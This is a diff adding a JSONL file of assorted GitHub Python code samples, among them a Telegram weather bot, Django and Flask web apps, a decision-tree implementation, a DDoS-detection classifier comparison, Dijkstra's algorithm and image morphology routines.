diff --git "a/4925.jsonl" "b/4925.jsonl" new file mode 100644--- /dev/null +++ "b/4925.jsonl" @@ -0,0 +1,881 @@ +{"seq_id":"12494920234","text":"import telebot\r\nimport requests\r\nimport json\r\n\r\n\r\nToken = open(\"token.txt\", \"r\").read()\r\nApi_key = open(\"apikey.txt\", \"r\").read()\r\n\r\nbot = telebot.TeleBot(Token)\r\n\r\n\r\ndef weather(text):\r\n resp = requests.get('http://api.openweathermap.org/data/2.5/weather?q='+text+'&appid='+Api_key)\r\n if resp.status_code == 200:\r\n data = json.loads(resp.content.decode('UTF-8'))\r\n name = 'Weather in the city ' + data['name'] + ' \\n \\n '\r\n temp = 'Temperature:' + str(int(round(data['main']['temp'] - 273))) + '° C \\n '\r\n state = 'State: ' + data['weather'][0]['description'] + ' \\n '\r\n wind = 'Wind: '+str(data['wind']['speed'])+' m/s\\n'\r\n return name+temp+state+wind\r\n else:\r\n return 'Can not find city ' + text\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start_message(message):\r\n bot . send_message ( message.chat.id,'Hello, write me the name of the city in English and I will find the weather '\r\n 'forecast.')\r\n\r\n\r\n@ bot . message_handler(func=lambda n: True)\r\ndef fun(message):\r\n bot.send_message(message.chat.id, weather(message.text))\r\n\r\ntry:\r\n bot.polling(none_stop=True, timeout=50)\r\nexcept:\r\n pass","repo_name":"im-yash/WeatherBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41229688542","text":"import os\nimport sys\nimport copy\n\ncurrent_file = os.path.basename(__file__)[:-3]\nsys.stdin = open(f\"input/{current_file}_input.txt\", \"r\")\nresult = []\n\nT = int(input())\n\n\ndef rotate(y, x, target, arr):\n global N\n\n if N - y - x == 1:\n return target\n\n for _ in range(N - y - x - 1):\n # right\n for i in range(x, N - x):\n if i == x:\n target[y][i] = arr[y + 1][i]\n else:\n target[y][i] = arr[y][i - 1]\n\n # down\n for i in range(y + 1, N - y):\n target[i][N - x - 1] = arr[i - 1][N - x - 1]\n\n # left\n for i in range(N - x - 1, x, -1):\n target[N - y - 1][i - 1] = arr[N - y - 1][i]\n\n # up\n for i in range(N - y - 1, y, -1):\n target[i - 1][x] = arr[i][x]\n\n arr = copy.deepcopy(target)\n\n return target\n\n\nfor case in range(1, T + 1):\n N = int(input())\n\n arr = list(list(map(int, input().split())) for _ in range(N))\n\n result.append(f\"#{case}\")\n\n rotate_result = []\n rotate_1 = []\n rotate_2 = []\n rotate_3 = []\n\n for i in range(N // 2):\n rotate_1 = rotate(i, i, arr, copy.deepcopy(arr))\n\n rotate_2 = copy.deepcopy(rotate_1)\n for i in range(N // 2):\n rotate_2 = rotate(i, i, rotate_2, copy.deepcopy(rotate_1))\n\n rotate_3 = copy.deepcopy(rotate_2)\n for i in range(N // 2):\n rotate_3 = rotate(i, i, rotate_3, copy.deepcopy(rotate_2))\n\n for i, j, k in zip(rotate_1, rotate_2, rotate_3):\n st = \"\".join(map(str, i))\n st += \" \"\n st += \"\".join(map(str, j))\n st += \" \"\n st += \"\".join(map(str, k))\n\n result.append(st)\n\nfor _ in result:\n print(_)\n\noutput = open(f\"output/{current_file}_output.txt\", \"r\").readlines()\noutput = [line.strip() for line in output]\nprint(result == output)\n","repo_name":"qkre/SWEA","sub_path":"PJH/1961.py","file_name":"1961.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8079443885","text":"#Dump and load convert between files and objects, while dumps and 
loads convert between strings and objects.\n#options de dump intéréssantes ==> indent=None, separators=None, \n\n\n#serialisation:\n#Exemple:\ndata = {\n \"president\": {\n \"name\": \"Zaphod Beeblebrox\",\n \"species\": \"Betelgeusian\"\n }\n}\n\n#Il est important d'arriver à sauvegarder des données\n\nimport json\n#méthode 1, retourne un fichier où le json est stocker\nwith open(\"data_file.json\", \"w\") as write_file:\n json.dump(data, write_file) \n#méthode 2, retourne une chaine de caractères dans laqeulle le json est stocké\njson_string = json.dumps(data) \n\n#deserialisation:\nimport json\n#methode 1 si le json est stocké dans un fichier\nwith open(\"data_file.json\", \"r\") as read_file:\n data = json.load(read_file)\n#methode 2 pour convertir une chaine de cara en json\ndata = json.loads(json_string)\n","repo_name":"lacornichon/twitterPredictor","sub_path":"WorkingDocs/serialisation_deserialisation_COURS.py","file_name":"serialisation_deserialisation_COURS.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30268220925","text":"from django.urls import path, reverse_lazy\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('register/', views.register, name='register'),\n path('login/', auth_views.LoginView.as_view(), name='login'),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('account/', views.dashboard, name='dashboard'),\n path('recipes', views.RecipeView.as_view(), name='recipes'),\n path('categories/', views.GroupView.as_view(), name='categories'),\n path('recipe_set/', views.SearchResultView.as_view(), name='recipe_set'),\n path('posts/', views.PostsView.as_view(), name='posts'),\n path('add/', views.AddView.as_view(), name='add'),\n path('/', views.SingleView.as_view(), name='single'),\n path('edit//', views.EditView.as_view(), name='edit'),\n path('delete//', views.Delete.as_view(), name='delete'),\n]","repo_name":"johnniekf/vegfreshlive","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1245563574","text":"import json\nimport random\nimport ast\n#from person import Player\n\nclass Team:\n def __init__(self, name, team_type,team_rating,num_players,num_int_players, jersey_colors, jersey_decorations, club):\n self.name = name\n self.team_type = team_type\n self.rating = team_rating\n self.players = {}\n self.num_players = num_players\n self.num_int_players = num_int_players\n self.jersey_colors = ast.literal_eval(jersey_colors)\n self.jersey_decorations = ast.literal_eval(jersey_decorations)\n self.club = club\n self.actual_positions = {\n \"goalkeeper\": {\"player_uuid\": None, \"tactic\": 0},\n \"libero\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftdef\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightdef\": {\"player_uuid\": None, \"tactic\": 0},\n \"lefthalf\": {\"player_uuid\": None, \"tactic\": 0},\n \"righthalf\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"centralmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftattack\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightattack\": {\"player_uuid\": None, \"tactic\": 0},\n 'sub1': {'player_uuid': None, 
'tactic': 0},\n 'sub2': {'player_uuid': None, 'tactic': 0},\n 'sub3': {'player_uuid': None, 'tactic': 0},\n 'sub4': {'player_uuid': None, 'tactic': 0},\n 'sub5': {'player_uuid': None, 'tactic': 0}\n }\n\n def return_name(self):\n return self.name\n\n def return_jersey_colors(self):\n return self.jersey_colors\n\n def return_jersey_decorations(self):\n return self.jersey_decorations\n\n def return_team_type(self):\n return self.team_type\n\n def to_dict(self):\n player_list = []\n for player_uuid in self.players.keys():\n player_dict = {\n 'uuid': str(player_uuid),\n 'jersey_number': self.players[player_uuid].jersey_number\n }\n player_list.append(player_dict)\n position_list = []\n for actual_position in self.actual_positions.keys():\n position_dict = {\n 'actual_position': actual_position,\n 'player_uuid': str(self.actual_positions[actual_position]['player_uuid']),\n 'tactic': self.actual_positions[actual_position]['tactic']\n }\n position_list.append(position_dict)\n\n #print(self.players)\n return {\n 'name': self.name,\n 'team_type': self.team_type,\n 'team_rating': self.rating,\n 'num_players': 0,\n 'num_int_players': 0,\n 'players': player_list,\n 'actual_positions': position_list,\n 'jersey_colors': str(self.jersey_colors),\n 'jersey_decorations': str(self.jersey_decorations)\n }\n\n def print_players(self):\n print(f\"Players in team {self.name}:\")\n for player_uuid in self.players:\n #print(f\"- {self.player[player.uuid].jersey_number} {player.first_name} {player.last_name} ({player.position})\")\n print(f\"- {self.players[player_uuid].jersey_number}\")\n\n def get_players(self):\n player_list = []\n for player in self.players.values():\n player_list.append((player.uuid, self.players[player.uuid].jersey_number, player.first_name, player.last_name, player.age, player.position))\n return player_list\n\n def add_player(self, player):\n player.add_team(self)\n self.players[player.uuid] = player\n self.players[player.uuid].jersey_number = 0\n #self.players.append(player)\n\n def return_num_players(self):\n return self.num_players,self.num_int_players\n\n def return_position(self):\n postion=self.player.return_position()\n return postion\n\n def change_player_jersey_number(self, player_uuid, new_jersey_number):\n # Check if jersey number is between 1 and 99\n #print (new_jersey_number)\n if new_jersey_number < 1 or new_jersey_number > 99:\n print(\"Jersey number must be between 1 and 99.\")\n return False\n\n # Check if no other player has the same jersey number\n #print(self.players)\n for player_uuid in self.players.keys():\n #print(self.players[player_uuid].jersey_number)\n if self.players[player_uuid].jersey_number == new_jersey_number and str(self.player.uuid) != str(player_uuid):\n print(f\"Player {self.player.first_name} {self.player.last_name} already has jersey number {new_jersey_number}.\")\n return False\n\n # Add or change the jersey number in the players dictionary\n if player_uuid in self.players:\n self.players[player_uuid].jersey_number = new_jersey_number\n return True\n else:\n print(f\"Player with UUID {player_uuid} not found in team {self.name}.\")\n return False\n\n def assign_player_to_position(self,position,position_uuid):\n # Create a list of player UUIDs\n player_uuids = list(self.players.keys())\n\n assign_uuid = None\n\n for player_uuid in player_uuids:\n if str(player_uuid) == str(position_uuid):\n assign_uuid = player_uuid\n\n if assign_uuid is not None:\n self.actual_positions[position][\"player_uuid\"] = assign_uuid\n\n def 
assign_players_to_positions(self):\n # Create a list of player UUIDs\n player_uuids = list(self.players.keys())\n\n # Shuffle the list of player UUIDs\n random.shuffle(player_uuids)\n\n # Assign each position to a player UUID\n self.actual_positions[\"goalkeeper\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"libero\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftdef\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightdef\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"lefthalf\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"righthalf\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"centralmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftattack\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightattack\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub1\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub2\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub3\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub4\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub5\"][\"player_uuid\"] = player_uuids.pop(0)\n\n","repo_name":"thelinkan/BandyManagerChatGPT","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":6986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35886393652","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# vim: ts=4:sw=4:sts=4:ai:et:fileencoding=utf-8:number\n\nimport select, time, sys, datetime\nfrom Config import Config\nimport traceback\n\n\nTRACE = True\n\n\nclass Log:\n\n def get_timestamp(self):\n return str(datetime.datetime.now())\n\n\n def pdebug(self,*args):\n if TRACE:\n try:\n if (args[0].__len__()) > Config.MAX_LEN_MSG:\n sys.stdout.write('%s, %s\\n' % (self.get_timestamp(), args[0][0:Config.MAX_LEN_MSG-3]+'..'))\n else:\n sys.stdout.write('%s, %s\\n' % (self.get_timestamp(), args[0]))\n except Exception as e:\n print(traceback.format_exc())\n print(args)\n print('!!! 
Log exception %s, %r' % (e, len(args)))\n return\n","repo_name":"jiquintana/tfc","sub_path":"__src__/working/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8637799246","text":"n, m = list(map(int, input().split()))\narr = []\nfor _ in range(n):\n arr.append(list(map(int, list(input()))))\n\nans = 1\nfor i in range(n):\n for j in range(m):\n M = min(n-i-1, m-j-1) # 가능한 최대 길이\n while M > 0:\n if 0 <= i+M < n and 0 <= j+M < m:\n if arr[i][j] == arr[i+M][j] and arr[i][j] == arr[i][j+M]\\\n and arr[i][j] == arr[i+M][j+M]:\n ans = max(ans, (M+1)*(M+1))\n # print(i, j, M, ans)\n break\n M -= 1\n\nprint(ans)\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1051.py","file_name":"1051.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18200708760","text":"import numpy as np\nimport pandas as pd\nimport math\n\ndef log2(x):\n if x == 0:\n return 0\n return math.log(x,2)\n\ndef main():\n file = \"training_set2.csv\"\n tree = decisionTree()\n testdata =pd.read_csv(\"test_set2.csv\")\n valid = pd.read_csv(\"validation_set2.csv\")\n df = tree.load_csv(file)\n heuristic = 'gain'\n print(\"building Tree\")\n root = tree.buildTree(df,df.columns[:-1], heuristic)\n# depth = 0\n print(tree.parse_tree(root,0))\n print(tree.accuracy(df,root))\n print(tree.accuracy(testdata,root))\n print(tree.accuracy(valid,root))\n \n root2 = tree.buildTree(df,df.columns[:-1],'variance')\n print(tree.parse_tree(root2,0))\n# print(depth)\n print(tree.accuracy(df,root2))\n print(tree.accuracy(testdata,root2))\n print(tree.accuracy(valid,root2))\nclass Node:\n def __init__(self):\n self.attr = None\n self.value = None\n self.left = None\n self.right = None\n self.parent = None\n \nclass decisionTree:\n def __init__(self):\n self.dataset = None\n \n def load_csv(self,filename):\n df = pd.read_csv(filename)\n self.dataset = df\n return df\n def getCount(self, arr):\n count = np.unique(arr, return_counts = True)[1]\n return count\n \n def entropy(self,column):\n counts = self.getCount(column)\n entropy = 0.0\n if len(counts)==0:\n return 0.0\n total = sum(counts)\n for i in range(len(counts)):\n entropy += -float(counts[i])/total*np.log2(float(counts[i])/total)\n return entropy\n \n \n def InfoGain_entropy(self,data,attr_name):\n total_entropy = self.entropy(data[\"Class\"])\n counts= self.getCount(data[attr_name])\n \n attr_Entropy = 0.0\n for i in range(len(counts)):\n probability = float(counts[i])/sum(counts)\n split = data.where(data[attr_name]==i).dropna()\n split_entropy = self.entropy(split[\"Class\"])\n attr_Entropy += probability * split_entropy\n \n return total_entropy - attr_Entropy\n \n def variance(self, column):\n counts = self.getCount(column)\n total = sum(counts)\n if len(counts)<=1:\n return 0\n variance = 1\n for i in range(len(counts)):\n variance*= float(counts[i])/total\n return variance\n \n def InfoGain_variance(self,data,attr_name):\n total_variance = self.variance(data[\"Class\"])\n counts= self.getCount(data[attr_name])\n attr_impurity = 0\n for i in range(len(counts)):\n probability = float(counts[i])/sum(counts)\n split = data.where(data[attr_name]==i).dropna()\n split_variance = self.variance(split[\"Class\"])\n attr_impurity += probability * split_variance\n \n gain = total_variance - attr_impurity\n return gain\n\n def max_freq(self,data, target):\n counts = 
self.getCount(data[target])\n freq = np.argmax(counts)\n return int(np.unique(data[target])[freq])\n\n def buildTree(self, data, attributes, heuristic):\n node = Node()\n unique = np.unique(data[\"Class\"])\n if len(unique) == 1:\n node.value = int(unique[0])\n \n elif len(data)==0:\n node.value = self.max_freq(self.dataset, \"Class\")\n \n elif len(attributes) ==0:\n node.value = node.parent\n else:\n node.parent = self.max_freq(data, \"Class\")\n \n max_gain = np.NINF\n best_attr = ''\n if heuristic=='gain':\n for attr in attributes:\n if attr!=\"Class\":\n gain = self.InfoGain_entropy(data,attr)\n if max_gain[-\\w]+)/(?P[-\\w]+)/$', view=views.maquina, name='urlMaquina'),\n url(r'^formMaquina', views.formularioMaquina, name='urlFormMaquina'),\n url(r'^FormEstrutura', views.formularioEstrutura, name='urlFormEstrutura'),\n url(r'^ajax/carregarEstruturas/', views.carregarEstruturas, name='ajaxCarregarEstruturas'),\n url(r'^ajax/carregarPrazosEstrutura/', views.carregarPrazosEstrutura, name='ajaxCarregarPrazosEstrutura'),\n url('accounts/login/', auth_views.LoginView.as_view(), name='loginForm'),\n url('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),\n url(r'^HourlyScheduleManagement1', views.hourlySchedManag1, name='urlHourlySchedManag1'),\n url(r'^HourlyScheduleManagement2/(?P[-\\w]+)/(?P[-\\w]+)/(?P[-\\w]+)/$', views.hourlySchedManag2, name='urlHourlySchedManag2'),\n url(r'^formHourlyScheduleManagement', views.formularioHourlySchedManag, name='urlFormHourlySchedManag'),\n url(r'^hsm', views.formularioHourlySchedManagAdd, name='urlFormHourlySchedManagAdd'),\n\n url(r'^ajax/carEstrProcHSM/', views.carregarEstrProcHSM, name='ajaxCarEstrProcHSM'),\n\n url(r'^bc', views.baixarCartao, name='urlBaixarCartao'),\n url(r'^cb/(?P[-\\w]+)/(?P[-\\w]+)/$', views.baixarCartaoSalvar, name='urlBaixarCartaoSalvar'),\n]\n","repo_name":"phsd/SGV-Prot-tipo","sub_path":"telaPrincipal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44717768562","text":"from flask import Flask\nfrom flask_restful import reqparse, abort, Api, Resource\nfrom flask_ngrok import run_with_ngrok\nfrom flasgger import Swagger\n\napp = Flask(__name__)\napi = Api(app)\nswagger = Swagger(app)\nrun_with_ngrok(app)\n\n\nBOOKS = {\n 'book0': {'title': 'placeholder', 'author': 'placeholder'}\n}\n\n\ndef abort_if_todo_doesnt_exist(book_id):\n if book_id not in BOOKS:\n abort(404, message=\"Book {} doesn't exist\".format(book_id))\n\nparser = reqparse.RequestParser()\nparser.add_argument('title')\nparser.add_argument('author')\n\n\n\nclass Book(Resource):\n def get(self, book_id):\n \"\"\"\n Get a specific book\n ---\n tags:\n - restful\n parameters:\n - in: path\n name: book_id\n required: true\n description: The specified book.\n type: string\n examples: book0\n responses:\n 200:\n description: Book List\n schema:\n id: Book\n properties:\n title:\n type: string\n default:\n author:\n type: string\n default:\n \"\"\"\n abort_if_todo_doesnt_exist(book_id)\n return BOOKS[book_id]\n\n def delete(self, book_id):\n \"\"\"\n Delete a book\n ---\n tags:\n - restful\n parameters:\n - in: path\n name: book_id\n required: true\n description: The ID of the book\n type: string\n responses:\n 204:\n description: Book deleted\n \"\"\"\n abort_if_todo_doesnt_exist(book_id)\n del BOOKS[book_id]\n return '', 204\n\n def put(self, book_id):\n \"\"\"\n Update a book's information\n ---\n tags:\n - restful\n 
parameters:\n - in: body\n name: body\n schema:\n $ref: '#/definitions/Book'\n - in: path\n name: book_id\n required: true\n description: The ID of the book\n type: string\n responses:\n 201:\n description: The information has been updated\n schema:\n $ref: '#/definitions/Book'\n \"\"\"\n args = parser.parse_args()\n book = {'title': args['title'], 'author': args['author']}\n BOOKS[book_id] = book\n return book, 201\n\n\nclass BooksList(Resource):\n def get(self):\n return BOOKS\n\n def post(self):\n \"\"\"\n Enter book data\n ---\n tags:\n - restful\n parameters:\n - in: body\n name: body\n schema:\n $ref: '#/definitions/Book'\n responses:\n 201:\n description: The book information has been updated\n schema:\n $ref: '#/definitions/Book'\n \"\"\"\n args = parser.parse_args()\n book_id = int(max(BOOKS.keys()).lstrip('book')) + 1\n book_id = 'book%i' % book_id\n BOOKS[book_id] = {'title': args['title'], 'author': args['author']}\n return BOOKS[book_id], 201\n\n\napi.add_resource(BooksList, '/books')\napi.add_resource(Book, '/books/')\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"BangBarMau/FinalAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38118302659","text":"from sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport warnings\nfrom multiprocessing import Process, Pool\nfrom Preprocess import Preprocess\nfrom numba import cuda\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# Malicious data from 'SYN\\\\Syn_2_split\\\\Syn_2_3.csv'\n'''\nbenign = Preprocess(\"D:/BENIGN.csv\")\nmalicious = Preprocess(\"D:/MALICIOUS.csv\")\nbenign_features_time = pd.read_csv(\"D:/Benign_features_time.csv\")\nmalicious_features_time = pd.read_csv(\"D:/Malicious_features_time.csv\")\n'''\n\nbenign_features_conn = pd.read_csv(\"D:/Benign_features_conn.csv\")\nmalicious_features_conn = pd.read_csv(\"D:/Malicious_features_conn.csv\")\n\n# Test, conn based\n\nx = pd.concat([malicious_features_conn, benign_features_conn]).values\n# Remove id\nx = [i[1:] for i in x]\ny = [0] * len(malicious_features_conn) + [1] * len(benign_features_conn)\n# X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=2019)\n\n# MLP\n\nmlp = MLPClassifier()\n\n# Random Forest\n\nrf = RandomForestClassifier(bootstrap=True, oob_score=True, criterion='gini')\n\n# Naive Bayes\n\nbernoulli_nb = BernoulliNB()\nmultinomial_nb = MultinomialNB()\n\n# Support vector machine\n\nsvm = SVC()\n\n# K-nearest neighbors\nknn = KNeighborsClassifier(n_neighbors=3)\n\ndef score(classifier, x=x, y=y, verbose=False, num_cv = 10):\n if verbose:\n print(\"Estimating\",type(classifier))\n accuracy = cross_val_score(classifier, x, y, cv=num_cv)\n precision = cross_val_score(classifier, x, y, cv=num_cv, scoring='precision')\n recall = cross_val_score(classifier, x, y, cv=num_cv, scoring='recall')\n if verbose:\n print(\"Classifier type:\", type(classifier), \"\\nAccuracy:\", accuracy, 
\"\\nPrecision:\", precision, \"\\nRecall:\", recall)\n return accuracy, precision, recall\n\n\n\n\nif __name__ == '__main__':\n pool = Pool(6)\n pool.apply_async(score, [mlp, x, y,True])\n pool.apply_async(score, [rf, x, y,True])\n pool.apply_async(score, [bernoulli_nb, x, y,True])\n pool.apply_async(score, [multinomial_nb, x, y,True])\n pool.apply_async(score, [svm, x, y,True])\n pool.apply_async(score, [knn, x, y,True])\n pool.close()\n pool.join()\n","repo_name":"uozkl/Machine-Learning-DDoS","sub_path":"src/score/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"30815539083","text":"import heapq as priority\nimport math\n\nvisited = {}\nparent_node = {}\n\ndef dijkstra(start,edges):\n\n def relax(a, b, wt):\n if b in visited:\n return\n if myDict[b] > myDict[a]+wt:\n myDict[b] = myDict[a]+wt\n parent_node[b] = a\n for i in range(len(h)):\n if h[i][1] == b:\n h[i][0] = myDict[a]+wt\n\n h=[]\n myDict = {}\n for i in edges:\n myDict[i] = math.inf\n myDict[start] = 0\n parent_node[start] = None\n [priority.heappush(h, [j,i]) for i, j in myDict.items()]\n visited[start]= True\n a = priority.heappop(h)\n while(a):\n value, vertice = a\n for b,wt in edges[vertice].items():\n relax(vertice, b, wt)\n\n try:\n a = priority.heappop(h)\n visited[a[1]] = True\n except:\n break\n\n return myDict\n\n\ndef parent(a):\n if a is not None:\n parent(parent_node[a])\n print(a)\n\n\ndef path(a):\n for i,j in a.items():\n print(\"path of \"+str(i))\n print(\"path length \"+str(j))\n parent(i)\n print('\\n')\n\n\n\n\n\nstart = 'S'\nedges = {'S':{'A':3,'C':2,'F':6},'A':{'D':1,'B':6},\n 'B':{'E':1},'C':{'A':2,'D':3},\n 'D':{'E':4},'E':{},'F':{'E':2}}\n\nresult = dijkstra(start=start,edges=edges)\npath(result)\n","repo_name":"raunakvijan/Algorithms","sub_path":"graphs/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41893701520","text":"from django.urls import path\nfrom elebox.views import index, corpusview, element, placeview, device\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('model3d//', corpusview, name='3dmodels'),\n path('model3d/', corpusview, name='3dmodels'),\n path('element/', element, name='radioelem'),\n path('element//', element, name='radioelem'),\n path('place/', placeview, name='places'),\n path('place//', placeview, name='places'),\n path('device/', device, name= 'devices'),\n path('device//', device, name= 'devices'),\n # path(r'^component/$', 'component'),\n]\n","repo_name":"Valber/rlmbase","sub_path":"elebox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"34103719761","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import collections as mc\n\nfigures_i = 0\nfigures_N = 40\n\n\ndef key_press_event(event):\n global figures_i\n fig = event.canvas.figure\n\n if event.key == 'q' or event.key == 'escape':\n plt.close(event.canvas.figure)\n return\n\n if event.key == 'right':\n figures_i = (figures_i + 1) % figures_N\n elif event.key == 'left':\n figures_i = (figures_i - 1) % figures_N\n\n fig.clear()\n my_plot(fig, figures_i)\n plt.draw()\n\n\ndef my_plot(fig, figures_i):\n ax = fig.add_subplot(111)\n\n iteration = 
str(figures_i).zfill(3)\n\n X = np.loadtxt(f\"output/RocketLanding2D/iteration{iteration}_X.txt\")\n U = np.loadtxt(f\"output/RocketLanding2D/iteration{iteration}_U.txt\")\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n\n lines = []\n line_colors = []\n\n K = X.shape[1]\n\n for k in range(K):\n rx = X[0, k]\n ry = X[1, k]\n vx = X[2, k]\n vy = X[3, k]\n theta = X[4, k]\n throttle = U[0, k]\n gimbal = U[1, k]\n\n # speed vector\n speed_scale = 0.\n lines.append(\n [(rx, ry), (rx + speed_scale * vx, ry + speed_scale * vy)])\n line_colors.append((0, 1, 0, 1))\n\n # attitude vector\n heading_scale = 0.05\n c_theta = heading_scale * np.cos(theta)\n s_theta = heading_scale * np.sin(theta)\n lines.append([(rx, ry), (rx + s_theta, ry + c_theta)])\n line_colors.append((0, 0, 1, 1))\n\n # thrust vector\n throttle_scale = 0.1\n Tx = throttle_scale * throttle * np.sin(theta + gimbal)\n Ty = throttle_scale * throttle * np.cos(theta + gimbal)\n lines.append([(rx, ry), (rx - Tx, ry - Ty)])\n line_colors.append((1, 0, 0, 1))\n\n lc = mc.LineCollection(lines, colors=line_colors, linewidths=1.5)\n\n ax.add_collection(lc)\n ax.axis('equal')\n ax.set_title(\"iter \" + str(figures_i))\n\n\ndef main():\n global figures_i, figures_N\n figures_N = sum(f.endswith(\"X.txt\")\n for f in os.listdir(\"output/RocketLanding2D/\"))\n fig = plt.figure(figsize=(10, 10))\n figures_i = figures_N - 1\n my_plot(fig, figures_i)\n cid = fig.canvas.mpl_connect('key_press_event', key_press_event)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"geotyper/SCpp","sub_path":"evaluation/RocketLanding2D/plot_RocketLanding2D.py","file_name":"plot_RocketLanding2D.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"29892153607","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nUAQ Thermo Breast Cancer\n\nmorphology.py\n\nauthor: Marco Garduno\nemail: mgarduno01@alumnos.uaq.mx\nlast modified: 14 March 2018\n'''\n\nimport cv2\nimport numpy as np\nimport functions as f\n\ndef dilation(map, size):\n height, width = map.shape\n auxMap = np.copy(map)\n\n for k in range(0, size):\n # B1\n for j in range(0, height):\n for i in range(0, width-1):\n if auxMap[j, i] < auxMap[j, i+1]:\n auxMap[j, i] = auxMap[j, i+1]\n\n # B2\n for j in range(0, height-1):\n for i in range(0, width):\n if auxMap[j, i] < auxMap[j+1, i]:\n auxMap[j, i] = auxMap[j+1, i]\n\n # B3\n for j in range(0, height):\n for i in range(width-1, 0, -1):\n if auxMap[j, i] < auxMap[j, i-1]:\n auxMap[j, i] = auxMap[j, i-1]\n\n # B4\n for j in range(height-1, 0, -1):\n for i in range(0, width):\n if auxMap[j, i] < auxMap[j-1, i]:\n auxMap[j, i] = auxMap[j-1, i]\n\n return auxMap\n\ndef erosion(map, size):\n height, width = map.shape\n auxMap = np.copy(map)\n\n auxMap = f.negative_gray(auxMap)\n auxMap = dilation(auxMap,size)\n auxMap = f.negative_gray(auxMap)\n\n return auxMap\n\ndef opening(map, size):\n auxMap = np.copy(map)\n\n auxMap = erosion(auxMap, size)\n auxMap = dilation(auxMap, size)\n\n return auxMap\n\ndef closing(map, size):\n auxMap = np.copy(map)\n\n auxMap = dilation(auxMap, size)\n auxMap = erosion(auxMap, size)\n\n return auxMap\n\ndef geodesic_dilation(I, J):\n height, width = I.shape\n flag = True\n\n while(flag):\n\n img_auxiliar = np.copy(J)\n\n for j in range(1, height):\n for i in range(1, 